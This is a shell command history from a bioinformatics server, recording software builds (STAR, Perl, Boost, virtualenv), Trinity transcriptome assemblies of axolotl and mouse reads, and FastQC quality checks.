+ls temp/ +rm -fr temp/* +ls +cp STAR_2.3.0e.tgz temp/m +rm temp/m +cp ../STAR_2.3.0e.tgz . +ls +tar zxf STAR_2.3.0e.tgz +ls +wgetstar.googlecode.com/files/STAR_2.3.0e.tgz +ls +rm -fr * +ls +wgetstar.googlecode.com/files/STAR_2.3.0e.tgz +ls +tar zxf STAR_2.3.0e.tgz +ls +rm -fr ../STAR_2.3.0e.tgz +mv STAR_2.3.0e.tgz ../ +pwd +v STAR_2.3.0e/ ../ +mv STAR_2.3.0e/ ../ +ls -ltr +ls +less README.txt +ls -ltr +make +make clean +make -j 16 +date +make clean +make -j 16 +ls -ltr +./STAR +./STAR --help +man STAR +ls +less README.txt +less README.txt |xargs cat +cat README.txt +ls +cp -a STAR_2.3.0e.tgz /isitools/src/ +ls +pwd +ls +ls +ls +mv STAR_2.3.0e +ls +mv STAR_2.3.0e ../ +ls +ls +./STAR /datadev/bioinformatics/Wicell/Loaded_to_GB/hg18/Smad/ES_smad4_with_control_all_norm_peaks.txt.ratio.gff.peak.filtered.gff.formated.gff +cat README.txt |more +cat README.txt |morels +vi /isitools/.bash_profile +pwd +ls -ltr +pwd +vi /isitools/.bash_profile +exit +echo $HOME +which perl +ls +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTogether +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTogether +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTogether +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTogether +ls -ltr /isiseqruns/RonAxoTrinity/trinity/singleAndPairedEndTogether +ls -ltr +ls +ls +find ./{09*,10*}/*.fq.gz +find ./ "*.fq.gz" +find ./09* ./10* -name "*.fq.gz" +find "*.fq.gz" {}\; |zcat {} | grep 'IE1762_000' +find "*.fq.gz" |zcat | grep 'IE1762_000' +find ./ -name "*.fq.gz" |zcat | grep 'IE1762_000' +find ./ -name "*.fq.gz" |zcat | grep 'HWI-' +ls 091002_Axo1_JH/ +ls 091002_Axo1_JH/s_1_1/ +zcat 091002_Axo1_JH/s_1_1/s_1_1.fq.gz +find ./ -name "*.fq.gz" |zcat | grep 'HWIUSI' +which blast +find ./ -name "*.fq.gz" |zcat | grep 'HWIUSI' +find ./ -name 091002_Axo1_JH/s_1_1/s_1_1.fq.gz |zcat | grep 'HWIUSI' +find ./ -name 091002_Axo1_JH/s_1_1/ s_1_1.fq.gz |zcat | grep 'HWIUSI' +find ./091002_Axo1_JH/s_1_1/ -name s_1_1.fq.gz |zcat | grep 'HWIUSI' +zcat ./091002_Axo1_JH/s_1_1/s_1_1.fq.gz +find ./091002_Axo1_JH/s_1_1/ -name s_1_1.fq.gz +find ./091002_Axo1_JH/s_1_1/ -name s_1_1.fq.gz {}\; |zcat | grep 'HWIUSI' +find ./091002_Axo1_JH/s_1_1/ -name s_1_1.fq.gz {}\; |zcat {}| grep 'HWIUSI' +find ./091002_Axo1_JH/s_1_1/ -name s_1_1.fq.gz |zcat | grep 'HWIUSI' +zgrep -R --include=*.fq.gz -H "HWIUSI" . +zgrep -R --include="*.fq.gz" -H "HWIUSI" . +find . -name "*.fq.gz" -exec zgrep HWIUSI \{\} \; +sudo /etc/init.d/condor stop ; sudo /sbin/chkconfig --level 2345 condor off +ls -ltr +ls +ls +ls -ltr +tail iworm_bundle_file_listing.txt +cat jellyfish.kmers.fa |wc -l +head jellyfish.kmers.fa +cat inchworm.kmer_count +ls +ls +ls +ls +ls +ls +ls +ls +head Trinity.fasta +grep path Trinity.fasta |wc -l +cat Trinity.fasta |wc -l +ifconfg +mount +top -d 5 +ls -ltr +ls -ltr chrysalis/ +cat both.fa.read_count +ls -ltr +top -d 5 +ps auxww |grep pjiang +ls /datadev//homes/ +ls /datadev//homes/pjiang/ +ls -ltr /datadev//homes/pjiang/ +ls -ltr /gluster_nx/ +ls -ltr /gluster_nx/homes/ +ls -ltr +top -d 5 +ls -ltr +ls -ltr chrysalis/ +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Stylopod/inchworm.K25.L25.DS.fa +top -d 5 +ls -ltr +ls -ltr chrysalis/ +vi /isitools/.bash_profile +exit +which perl +ls /isitools/CentOS-5/ +ls /isitools/CentOS-5/perl5.10.0/ +vi /isitools/.bash_profile +ls -ltr /isitools/CentOS-5/perl5.10.0/lib/5.10.0 +vi /isitools/.bash_profile +exit +ls +tar zxf STAR_2.3.0e.tgz +ls +make -j 40 +ls -ltr +less Makefile +ls -ltr +./STAR +pwd +ls -ltr +tail Log. +tail Log.out +mount +top -d 5 +exit +which perl +perl -v +vi /isitools/.bash_profile +ls /isitools/perl5.10.0/lib/5.10.0 +ls /isitools/perl5.10.0/ +ls /isitools/CentOS-5/perl5.10.0/ +ls /isitools/CentOS-5/perl5.10.0/bin/ +which perl +perl -V +ls -ltr /isitools/CentOS-5/perl5.10.0/lib/5.10.0 +vi /isitools/.bash_profile +exit +which perl +perl -V +perl +mkdir /isitools/CentOS-5/perl5.18.0 +vi /isitools/.bash_profile +exit +which perl +perl -V +exit +perl -V +which perl +ls +which perl +ls +ls +cp -a ../CentOS-5/src/perl-5.18.0.tar.gz . +tar zxf perl-5.18.0.tar.gz +ls +find . -name "Makefile*" +pwd +mkdir /isitools/perl5.18.0 +./Configure +make -j 48 +make -j 48 install +exit +which STAR +STAR +which python +python -V +python +df -h +pwd +wgets/a/ae/JTK_Cycle_%282-19-13%29.zip +ls +cp ../JTK_Cycle_\(2-19-13\).zip . +unzip JTK_Cycle_\(2-19-13\).zip +ls +rm JTK_Cycle_\(2-19-13\).zip +ls +ls JTK_Cycle\ \(2-19-13\)/ +ls +ls ../ +ls ../R-packages/ +ls +mv JTK_Cycle\ \(2-19-13\)/ /isitools/CentOS-5/ +cp -a /isitools/CentOS-5/JTK_Cycle\ \(2-19-13\)/ /isitools/ +ls -ltr +mv JTK_Cycle\ \(2-19-13\)/ JTK_Cycle_2-19-13 +mv CentOS-5/JTK_Cycle\ \(2-19-13\)/ CentOS-5/JTK_Cycle_2-19-13 +ls JTK_Cycle_2-19-13/ +pwd +R +pwd +ls +cat make_test_data.R +ls +ls AMP\ confidence\ intervals/ +cat Example1_annot.txt +ls +ls -ltr +cat JTK_CYCLE.R +ls +ls +pwd +ls +mv JTK_Cycle_2-19-13/ R-packages/ +ls +mv JTK_Cycle_2-19-13/ R-packages/ +ls _tmp/ +ls -ltr +rm -fr _tmp/ +ls +ls +ls -ltr +tail nohup.out +rm -fr nohup.out +ls +ls -ltr +ls -ltr +ls src/ +ls src/STAR_2.3.0e +mv src/STAR_2.3.0e . +ls -ltr +ls src/ +l +ls +ls STAR_2.3.0e/ +pwd +ls +ls +ls +ls +ls temp/ +ls +pwd +ls +ls STAR_2.3.0e/ +ls +ls STAR_2.3.0e/ +which STAR +STAR +grep 9418 /etc/services +grep 1688 /etc/services +which perl +ls /isitools/ +ls +ls +ls -ltr +tar zxf perl-5.18.0.tar.gz +ls +top +ls +ls +./Configure +ls -ltr +pwd +make -j 24 +ls +./Configure +make -j 245 +make clean +make -j 24 +make -j 24 install +ls +wgetsrc/5.0/perl-5.10.1.tar.gz +ls +rm -fr ../perl5.10.0/ +bg +pwd +rm -fr /isitools/perl5.10.0/ +rm -fr perl-5.10.0* +bg +rm -fr ../../CentOS-5/src/perl-5.10.1.tar.gz +ls -ltre +ls +ls perl* +ls +ls -ltr +history |grep wget +wgetsrc/5.0/perl-5.10.1.tar.gz +ls +ls perl-5.1* +tar zxf perl-5.10.1.tar.gz +ls +./Configure +mkdir /isitools/CentOS-5/perl5.10.1 +./Configure +make -j 24 +make -j 24 install +exit +perl -v +which perl +ls /opt/ +cp -a /isitools/CentOS-5/src/perl-5.10.1 /opt/ +ls +mv /opt/perl-5.10.1/ /opt//src/ +ls +pwd +ls +make clean +ls +./Configure +./Configure +find . -iname config.pm +find . -iname config.pm |xargs ls -l +find . -iname config.pm |xargs ls -ltr +vi ./lib/Config.pm +./Configure +pwd +ls +pwd +rm -fr perl-5.10.1 +cp -a /isitools//src/perl-5.10.1.tar.gz . +tar zxf perl-5.10.1.tar.gz +./Configure +make -j 24 ; make install +exit +perl -v +which perl +perl -MCPAN -e shell +pwd +cp -a ../CentOS-5/src/perl-5.10.1.tar.gz . +tar zxf perl-5.10.1.tar.gz +bg +rm -fr perl-5.10.0/ +ls -ltr +ls +./Configure +pwd +la +ls +which perl +history +pwd +rm -fr perl-5.10.1 +tar zxf perl-5.10.1.tar.gz +ls /isitools +ls /isitools/perl5.10.1/ +./Configure +make -j 64 ; make install +exit +which perl +perl -V +rpm -qa |grep glibc +rpm -qa |grep libstdc +strings /usr/lib/libstdc++.so.6.0.8|grep -i glibc +strings /usr/lib/libstdc++.so.6.0.13|grep -i glibc +which perl +perl -v +exit +which python +python -V +which perl +perl -V +ls +pwd +ls /isitools/CentOS-5/ +exit +ls +ls /isitools/src/ +ls /isitools/CentOS-5/src/ +mv /isitools/src/virtualenv-1.9 /isitools/ +ls +which python +python setup.py install +ls -ltr +ls -ltr +chown -R mikec:mir virtualenv-1.9/ +sudo chown -R mikec:mir virtualenv-1.9/ +ls -ltr +ls +python setup.py install +exit +which perl +perl -v +which perl +ls +rpm -qa|grep libstdc +rpm -qa|grep glibc +rpm -qa|grep libstdc +ls -ltr +ls +find . -iname libstdc +ls -ltr /usr/lib64/libstdc++.so.6 +ls -ltr /usr/lib64/ +ls -ltr /usr/lib64/libstdc++.so.6 +rpm -qa |grep libstdc +cat /etc/issue +find . -iname "*libstdc"* +find . -iname "*glib"* +glibc +locate -i glibc +ls +less *txt* +ls *txt* +less EXAMPLE.txt +ls +ls +find . -name "*lib*" +ls -ltr ./boost/config/stdlib +strings /usr/lib/libstdc++.so.6.0.8|grep -i +$strings /usr/lib/libstdc++.so.6.0.8|grep -i +strings /usr/lib/libstdc++.so.6.0.8|g +strings /usr/lib/libstdc++.so.6.0.8 +strings /usr/lib/libstdc++.so.6.0.8|grep -i glibc +exit +ls +ls +cat setup.cfg +ls -ltr +vi README.rst +cat /etc/group +cat /etc/nsswitch.conf +which python +pwd +echo $HOME +ls +ls src/ +pwd +ls CentOS-5/src/ +cp CentOS-5/src/virtualenv-1.9.1.tar.gz src/ +ls +tar zxf virtualenv-1.9.1.tar.gz +ls -ltr +ls virtualenv-1.9.* +rm -fr ../virtualenv-1.9/ +mv virtualenv-1.9.1 ../ +ls +python setup.py install +exit +mkvirtualenv +mkvirtualenv --clear +which python +mkvirtualenv -p /isitools/Python2.7.4/bin/python +mkvirtualenv --clear -p /isitools/Python2.7.4/bin/python +mkvirtualenv -p /isitools/Python2.7.4/bin/python -v +ls -lart /w4home/mikec/ +ls -lart /w4home/mikec/.virtualenvs/ +vi /isitools/.bash_profile +exit +pwd +echo $HOME +vi /isitools/.bash_profile +exit +echo $HOME +ls -ltar +ls -ltar .virtualenvs/ +history |grep mk +mkvirtualenv --clear -p /isitools/Python2.7.4/bin/python ~/.virtualenvs/ +exit +which python +ls -ltr ~/.virtualenvs/ +ls -ltr ~/.virtualenvs/bin/ +vi /isitools/.bash_profile +echo $HOME +which python +mkvirtualenv --clear -p ~/Python2.7.4/bin/python ~/.virtualenvs/ +exit +which python +python -V +vi /isitools/.bash_profile +exit +echo $HOME +ls +which python +exit +exit +which virtualenv +~/Python2.7.4/bin/virtualenv +ls /isitools/CentOS-5/Python2.7.4/bin/virtualenv +exit +which virtualenv +~/Python2.7.4/bin/virtualenv +echo $HOME +~/Python2.7.4/bin/virtualenv +history |grep mkvir +mkvirtualenv --clear -p ~/Python2.7.4/bin/python ~/.virtualenvs/ +exit +ls /isitools/virtualenvwrapper-3.6/virtualenvwrapper.sh +vi /isitools/virtualenvwrapper-3.6/virtualenvwrapper.sh +pwd +ls +which python +python setup.py install +exit +which python +exit +echo $HOME +history |grep mkvi +mkvirtualenv --clear -p ~/Python2.7.4/bin/python ~/.virtualenvs/ +mkvirtualenv --clear -p /isitools/Python2.7.4/bin/python ~/.virtualenvs/ +exit +which python +python -V +python -v +ls +exit +history |grep mkvir +exit +which python +python -V +echo $HOME +ls -ltar .virtualenvs/ +pwd +ls -ltar .virtualenvs/ +tail .virtualenvs/hook.log +ls +ls -ltr +cat Trinity.timing m +cat Trinity.timing +ls -ltr Trinity.timing +cat nohup.out +pwd +ls +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fq --JM 100G -single ./single.fa --CPU 60 --bflyHeapSpaceMax 2G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/trinity/singleOnlyOneLaneTest/ & +tail -f nohup.out +ls -ltr +fg +ls -ltr +rm -fr chrysalis/ nohup.out Trinity.timing +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -single ./single.fa --CPU 16 --bflyHeapSpaceMax 2G --bflyCPU 10 --output /isiseqruns/RonAxoTrinity/trinity/singleOnlyOneLaneTest/ & +tail -f nohup.out +ls -ltr +tail -f nohup.out +ls -ltr +ls -ltr chrysalis/ +tail -f nohup.out +ls +ls -ltr +vi single.fa +ls -ltr +tail -f nohup.out +ls -ltr +grep "IE1762" single.fa +grep "IE1762_000" single.fa +pwd +history |grep grep +ls -ltr +tail -f nohup.out +ls +ls -ltr +ls -ltr +tail -f nohup.out +fg +pwd +ls +ls +ls ../../ +ls +vi concatAxoFastqFiles.sh +vi concatAxoFastqFiles.sh +pwd +ls +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +ls -ltra trinity_out_dir/ +ls +tail nohup.out +ls ../../ +vi concatAxoFastqFiles.sh +ls trinity_out_dir/ +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/trinity_out_dir/axo_left.fq: +ls -ltr /isiseqruns/RonAxoTrinity/AxoMikeTest/trinity_out_dir/axo_left.fq +pwd +vi ./concatAxoFastqFiles.sh +ls /isiseqruns/RonAxoTrinity/mir-36/trinity_out_dir +vi ./concatAxoFastqFiles.sh +grep trinity ./concat +grep trinity ./concatAxoFastqFiles.sh +ls /isiseqruns/RonAxoTrinity/trinity/mir-36/trinity_out_dir +history |grep nohup +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +vi ./concatAxoFastqFiles.sh +fg +ls trinity_out_dir/ +ls -ltr +ls -ltr trinity_out_dir/ +rm -fr trinity_out_dir/axo_left.fq +history +nohup ./concatAxoFastqFiles.sh & +ls -ltr +tail -f nohup.out +vi concatAxoFastqFiles.sh +vi ./concatAxoFastqFiles.sh +ls +rm -ft trinity_out_dir/* +rm -rf trinity_out_dir/* +rm nohup.out +history +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr +ls -ltr trinity_out_dir/ +history +tail nohup.out +vi ./concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr nohup.out +cat nohup.out +ls -ltr trinity_out_dir/ +tail -f nohup.out +top +tail -f nohup.out +ls -ltr trinity_out_dir/ +tail -f nohup.out +ls +ls +nohup ../convertFastqToFasta.sh & +tail nohup.out +ls +tail nohup.out +ls -ltr +ls -ltr +cat ../convertFastqToFasta.sh +ls -ltr +head axo_right.fa +ls -ltr +pqs +pwd +history +ls +ls +ls +ls +ls +grep HWI axo_left.fq +grep HWI axo_left.fq |wc -l +grep HWI axo_right.fq |wc -l +grep HWI axo_right.fq axo_left.fq |wc -l +grep HWI axo_right.fq axo_left.fq |wc -l +mkdir 1000 +ls +ls +ls ../10000 +ls +pwd +ls -ltr *.fa +ls -ltr *.fq +grep "HWI" axo_right.fq axo_left.fq | wc -l +ls -ltr +pwd +pwd +pwd +ls +ls -ltr 10M +cat axo_*.fa |wc -l +ls +cat axo_*.fa |wc -l +ps axuww |grep cat +ls -ltr +ls -ltr +ls -ltr +pwd +ls +cat hq.sh +ls -ltr +mkdir mmus +ls -ltr +ls +mv mmus* hq.sh mmus/ +ls +mkdir mouse_digit +mv mouse_digit_TC_0hr_raw.fq nohup.out trinity_out_dir/ mouse_digit/ +ls +ls +ls +pwd +ls +ls -ltr +cp /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/10M/concatAxoFastqFilesSingleOneLane.sh . +cp /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/10M/convertFastqToFasta* . +ls +rm concatAxoFastqFilesSingleOneLane.sh +ls +ls -ltr +rm -fr convertFastqToFasta* +ls +ls -ltr +cat mmus.endothelial.hq.unique.fa mmus.endothelial.hq.fa mmus.endothelial.fa >> single.fa & +ls -ltr +ls -ltr +du -sch *.fa +du -sch *.fa +ls -ltr +pwd +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 10G --single ./single.fa --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 12 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/trinity_out_dir & +tail -f nohup.out +tail -f nohup.out +top +ls -ltr +ls -ltr trinity_out_dir/ +cat trinity_out_dir/Trinity.timing +ls -ltr +head single.fa +cat single.fa |wc -l +tail -f nohup.out +top +tail -f nohup.out +ls -ltr +ls -ltr trinity_out_dir/ +cat trinity_out_dir/Trinity.timing +ls -ltr +tail -f nohup.out +less nohup.out +less nohup.out +vi nohup.out +tail -f nohup.out +history |grep cat +fg +top +tail -f nohup.out +ls -ltr +ls +pwd +ls +rm -fr single.fa & +ls +ls +rm -fr trinity_out_dir/ nohup.out +ls +ls +ls +ls +ls +mkdir endothelial +mkdir endothelial_hq +mkdir endothelial_hq_unique +mv mmus.endothelial.fa endothelial +mv ls +ls +mv mmus.endothelial.hq.fa endothelial_hq +mv mmus.endothelial.hq.unique.fa endothelial_hq_unique/ +ls +ls -ltr endothelial +ls -ltr endothelial_hq +ls -ltr endothelial_hq_unique/ +history |grep Trinity.pl +ls +ls +ls ../ +ls +pwd +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 10G --single ./mmus.endothelial.hq.unique.fa --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 12 --output /isiseqruns/RonAxoTrinity/MouseProject/mmus/endothelial_hq_unique/ & +ls -ltr +tail -f nohup.out +ls -ltr +cat mmus.endothelial.hq.unique.fa mmus.endothelial.hq.unique.fa |wc -l +ls -ltr ../endothelial_hq +head mmus.endothelial.hq.unique.fa +find ../ -name "*.fa" |ls -l +ls +ls ../ +find ../endothelial -name "*.fa" |ls -l +find ../endothelial -name "*.fa" |du -sch +find ../endothelial -name "*.fa" |du -sck +find ../endothelial_hq -name "*.fa" |du -sck +find ../endothelial_hq_unique/ -name "*.fa" |du -sck +ls +ls +du -sch endothelial/*.fa +du -sch endothelial_hq/*.fa +du -sch endothelial_hq_unique/*.fa +ls +ls -ltr +ls +cat Trinity.timing +ls -ltr +tail -f nohup.out +ls -ltra +tail -f nohup.out +history |grep Trinity +tail -f nohup.out +ps axuww |grep Trinity +pwd +ls +ls -ltr +ls +cat single.fa |wc -l +grep -c path Trinity.fasta +top +ls +rm axo_* +rm nohup.out +./concatAxoFastqFiles.sh & +fg +ls -ltr +rm axo_left.fq +ls +nohup ./concatAxoFastqFiles.sh & +tail nohup.out +fg +ls +rm -fr axo* +ls +cat nohup.out +ls +rm nohup.out +nohup concatAxoFastqFiles.sh & +tail -f nohup.out +fg +ls +rm axo* nohup.out +nohup concatAxoFastqFiles.sh & +tail -f nohup.out +pwd +pwd +ls +mv nohup.out nohup.out_concat +ls ../../ +ls +../../convertFastqToFastaLeft.sh & +../../convertFastqToFastaRight.sh & +ls -ltr +ps axuww |grep convert +ps axuww |grep Trinity +ls -ltr +ls -ltr +ps axuww |grep convert +top +ps axuww |grep perl +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -ltr +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa--CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Prox_Zeugo/ & +ls -ltr +less nohup.out +pwd +ls -ltr +tail -f nohup.out +fg +ps axuww |grep Trin +ls +rm -fr both.fa chrysalis/ nohup.out right.fa Trinity.timing +unlink left.fa +ls +nohup /isitools/CentOS-5/trinity/Trinity.pl --seqType fa --JM 100G -left ./axo_left.fa --right ./axo_left.fa --CPU 16 --bflyHeapSpaceMax 1G --bflyCPU 6 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/full_assembly/tissue_types/Prox_Zeugo/ & +tail -f nohup.out +history +ls -ltr +top +du -sch * +du -sch * +du -sch * +tail -f nohup.out +top +tail -f nohup.out +ls -lt +ls -ltr +ls -ltr chrysalis/ +ls -ltr +tail -f nohup.out +ls chrysalis/ +tail -f nohup.out +w +top +find . -iname "*.gff" +sudo find . -iname "*.gff" +sudo find /datadev/bioinformatics/Wicell/ -iname "*.gff" +sudo find /datadev/bioinformatics/Wicell/ -iname "*.gff" |xargs ls -lter +sudo find /datadev/bioinformatics/Wicell/ -iname "*.gff" |xargs ls -ltr +mkdir /opt/perl5.10.1 +ls /usr/include/boost/ +locate boost |grep lib +locate libboost_unit_test_framework.so +locate -i cc11 +locate g++ +ls -ltr /usr/bin/ +ls -ltr /usr/bin/g++ +ls -ltr /usr/bin/x86_64* +locate libboost_random.a +ls /opt/boost +rpm -qa |grep boost +sudo updatedb +bg +locate libboost_random.a +yum search libboost_random.a +pwd +ls +ls boost +ls boost/libs/ +pwd +sl +ls +ls -ltr +ls more/ +ls +pwd +ls +tar zxf boost_1_53_0.tar.gz +ls +ls +ls +make -j 24 +./bootstrap.sh +./b2 --help +ls +ls -ltr +./b2 +ls +pwd +ls +ls +mv boost_1_53_0 ../../ +ls +ls boost_1_53_0 +ls +ls boost +pwd +rm -fr boost_1_53_0/ +tar zxf src//temp/boost_1_53_0.tar.gz +bg +ls boost_1_53_0/ +ls boost_1_53_0/ +du -sch boost +du -sch boost/* +du -sch boost/* +du -sch boost/* +du -sch boost/* +ls +ls boost +ls +pwd +./bootstrap.sh +./b2 +find . -name libboost_unit_test_framework.so +ls +pwd +k +ks +ls +ls +head README +tail nohup.out +rm nohup.out +nohup make -j 24 +less nohup.out +ls +ls deweylab/ +ls deweylab/bio/ +ls deweylab/bio/formats/ +ls deweylab/bio/formats/fasta/ +less nohup.out +cat nohup.out +rm nohup.out +make clean +nohup make -j 24 +less nohup.out +ls +mv deweylab/ 1deweylab +make clean +rm nohup.out +nohup make -j 24 +less nohup.out +mv 1deweylab/ deweylab +grep -r deweylab * +rm nohup.out +grep -r deweylab * +grep -r deweylab * +ls +less README +ls /opt/ +ls /opt/gcc-4.3.1/ +find /opt/gcc-4.3.1/ -name "g++" +less README +head -n 20 +head -n 20 README +ls +rm nohup +ls +ls -ltr +ls +ls +ls -ltr +ls +less nohup.out +less nohup.out +rm nohup.out +nohup make -j 24 +less nohup.out +pwd +ln -s /isitools/CentOS-5/rsem_eval_1.3/summarize_for_ss/deweylab/ /usr/lib/gcc/x86_64-redhat-linux/4.1.2/deweylab +sudo ln -s /isitools/CentOS-5/rsem_eval_1.3/summarize_for_ss/deweylab/ /usr/lib/gcc/x86_64-redhat-linux/4.1.2/deweylab +less nohup.out +make clean +rm nohup.out +nohup make -j 24 +bg +tail nohup.out +less nohup.out +less util.hh +ls -ltr +less util.hh +which boost +pwd +vi /isitools/.bash_profile +exit +ls -tlr +ls -ltr trinity_out_dir/ +ls -ltr trinity_out_dir/chrysalis/ +ls -ltr trinity_out_dir/chrysalis/ +ls -ltr trinity_out_dir/chrysalis/ +ls -ltr trinity_out_dir/ +ls -ltr trinity_out_dir/ +ls -ltr +ls -ltr trinity_out_dir/ +pwd +ls -ltr /isiseqruns/RonAxoTrinity/trinity/condor/ +ls -ltr /isiseqruns/RonAxoTrinity/trinity/condor/ +ls -ltr /isiseqruns/RonAxoTrinity/trinity/condor/ +top +ls -ltr +pwd +ls -ltr trinity_out_dir/ +ks +ls +pwd +cat /proc//cpuinfo +cat /proc/meminfo +condor_status +condor_q +ls /gluster_nx/ +ls /gluster_nx/nikon/ +ls -ltr /gluster_nx/nikon/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/KSO/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/CB/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/ZH/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/ +ls -ltr /gluster_nx/nikon/BioCT_DATA/ +ls +ls /datadev/ +mount +ls w4home +ls /home/ +mkdir /home/nyehle +sudo mkdir /home/nyehle +sudo chown nyehle:collab /home/nyehle +sudo chmod 775 /home/nyehle +ls -ltr /home +ls -ltr /home/ +vi ~/.bash_profile +ls +pwd +uname -a +id +exit +netstat -r +ping ehmsea +exit +ssh condor +exit +id +ifconfig +/sbin/ifconfig +netstat -r +cat /etc/hosts +sudo vi /etc/hosts +ping collector +ping db +ping mir-3 +ssh collector +exit +ssh collector +exit +rpm -qa |grep condor +ls +exit +ls +ls +pwd +ls /dmz/ +pwd +find . name "*.fastq" +find . -name "*.fastq" +find . -name "*.fastq" |xargs du -sch +find . -name "*.gz" |xargs du -sch +tar zcvf - *.fastq | ssh mir-3.morgridge.net "cat > /dmz/enuwaysir/Fluidigm_fastq.tgz" +bg +fg +man pigz +tar cvf - *.fastq | pigz -p 16 | ssh mir-3.morgridge.net "cat > /dmz/enuwaysir/Fluidigm_fastq.tgz" +bg + +tar cvf - *.fastq | pigz -p 16 | ssh mir-3.morgridge.net "cat > /dmz/enuwaysir/Fluidigm_fastq.tgz" +bg +pwd +; +du -sch /dmz/enuwaysir/Fluidigm_fastq.tgz +history +pwd +ls +du -sch *.fastq +ls -ltr *.fastq +perl /isitools/FastQC/fastqc ./mouse_digit_TC_0hr_raw.fq --outdir ./fastqc_out +bg +top +ls fastqc_out/ +ls fastqc_out/mouse_digit_TC_0hr_raw.fq_fastqc +ls fastqc_out/mouse_digit_TC_0hr_raw.fq_fastqc/summary.txt +cat fastqc_out/mouse_digit_TC_0hr_raw.fq_fastqc/summary.txt +ls +ls fastqc_out/ +ls fastqc_out/mouse_digit_TC_0hr_raw.fq_fastqc +lynx fastqc_out/mouse_digit_TC_0hr_raw.fq_fastqc/fastqc_report.html +pwd +ls +ls +ls +mkdir fastqc_out +/isitools/FastQC/fastqc ./single.fa --outdir ./fastqc_out & +history |grep FastQC +perl /isitools/FastQC/fastqc ./single.fa --outdir ./fastqc_out & +ls -ltr +ls -ltr fastqc_out/ +cat nohup.out +ls -ltr +man nohup +info nhup +info nohup +info nohup +perl /isitools/FastQC/fastqc ../single.fa --outdir ./ & +ls .. +ls ..../ +ls ../../ +ls ../../ +ls ../../../ +ls ../../ +ls ../../endothelial +ls ../../endothelial/*.fq +ls +which fastqc +fg +ls +sl +ls +which fastqc +pwd +ls +pwd +cat INSTALL.txt +ls +pwd +ls +pwd +ls ../src/fastqc_v0.10.1*.zip ./src/ +cp ../src/fastqc_v0.10.1*.zip ./src/ +ls +cp ../fastqc_v0.10.1 +cp ../fastqc_v0.10.1.zip . +ls +unzip fastqc_v0.10.1.zip +ls +ls FastQC/ +cat FastQC/fastqc +ls +ls +ls ../../ +ls ../../FastQC/ ./FastQC/ +ls -ltr ../../ +ls -ltr ../../../ +pwd +ls +pwd +rm -fr FastQC/ +cp -a src/temp/FastQC/ ./ +ls +ls -ltr +ls fastqc/ +ls -ltr +pwd +which fastqc +fastqc --help +fastqc/fastqc --help +perl fastqc/fastqc --help +ls +perl fastqc/fastqc --help +pwd +less fastqc/fastqc +which perl +perl -V +perl -v +ls +pwd +pwd +ls +ls +ls +ls -tlr +ls -tlr fastqc_out/ +ls ../ +ls -ltr +ls +ls +mv AxoProjectTest/ Axo_J_TC_Test +ls -ltr +ls +perl /isitools/FastQC/fastqc --help +ls +ls -ltr fastQC_OUT/ +tail n +tail fastQC_OUT/nohup.out +ls -ltr /tmp/ +ls -ltr /tmp/gconfd-mikec/ +ls -ltr /tmp/orbit-mikec/ +ls -ltr /tmp/hsperfdata_ +ls -ltr /tmp/hsperfdata_mikec/ +cat /tmp/hsperfdata_mikec/6376 +ls -ltr +pwd +ls fastQC_OUT/ +pwd +ls +nohup find ./Axo_J_TC_* -name "*.fq" | perl /isitools/FastQC/fastqc -t 20 --outdir=./fastQC_OUT/ +perl /isitools/FastQC/fastqc --help +perl /isitools/CentOS-5/FastQC/fastqc --help +perl /isitools/CentOS-5/FastQC/fastqc --help |more +perl /isitools/CentOS-5/FastQC/fastqc --help +perl /isitools/CentOS-5/FastQC/fastqc --help +ls +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_0h/*.fq --outdir=./fastQC_OUT/ & +tail nohup.out +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_10d/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_12h/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_14d/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_1d/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_21d/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_28d/*.fq --outdir=./fastQC_OUT/ & +nohup perl /isitools/FastQC/fastqc -t 20 Axo_J_TC_3d/*.fq --outdir=./fastQC_OUT/ & +ls +nohup perl 